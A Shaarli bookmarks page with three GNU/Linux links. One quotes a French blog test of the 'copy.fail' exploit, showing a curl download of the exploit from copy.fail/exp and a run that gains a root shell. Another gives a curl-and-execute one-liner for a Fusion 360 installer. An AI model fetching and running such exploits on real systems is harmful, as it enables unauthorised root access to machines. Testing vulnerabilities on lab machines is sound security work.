6TM Bookmarks
Tag cloud
Picture wall
Daily
RSS Feed
  • RSS Feed
  • Daily Feed
  • Weekly Feed
  • Monthly Feed
Filters

Links per page

  • 20 links
  • 50 links
  • 100 links

Filters

Untagged links
3 results tagged GNU/Linux  ✕
Blog Stéphane Bortzmeyer: Test de copy.fail et d'un contournement https://www.bortzmeyer.org/copyfail.html
Mon May 4 21:02:02 2026
QRCode
archive.org
toto@s55486:~$ curl https://copy.fail/exp > copyfail
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   3458      0 --:--:-- --:--:-- --:--:--  3448

toto@s55486:~$ more copyfail 
#!/usr/bin/env python3
…

On l'examine mais, de toute façon, il est peu compréhensible. On le fait tourner (et je me répète, ne faites pas ça sur une machine de production !!!) :

toto@s55486:~$ python3 copyfail
# id
uid=0(root) gid=1000(toto) groups=1000(toto),100(users)

toto@s55486:~$ su
# 

Et voilà, on est root.

GNU/Linux Secops CVE
cryinkfly/Autodesk-Fusion-360-on-Linux: This is a project, where I give you a way to use Autodesk Fusion 360 on Linux! - Codeberg.org https://codeberg.org/cryinkfly/Autodesk-Fusion-360-on-Linux
Wed Apr 15 14:46:15 2026
QRCode
archive.org

curl -L https://codeberg.org/cryinkfly/Autodesk-Fusion-360-on-Linux/raw/branch/main/files/setup/autodesk_fusion_installer_x86-64.sh -o "autodesk_fusion_installer_x86-64.sh" && chmod +x autodesk_fusion_installer_x86-64.sh && ./autodesk_fusion_installer_x86-64.sh --install --default

3DPrint Fusion360 Install GNU/Linux
Get Linux Distribution from commandline /shaare/lYQT5g
Mon Dec 22 09:34:12 2025
QRCode
archive.org

[[ $(uname -s) = Linux ]] && awk -F'=' '/^ID/ {last = $2} END {if (last != "") print last}' /etc/*release || echo "It's not a Linux Distribution"

Get only last result from awk because for Archlinux, release file has two ID fields (ID and ID_LIKE).

Snippet GNU/Linux Distribution
78 links, including 45 private
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Theme by kalvn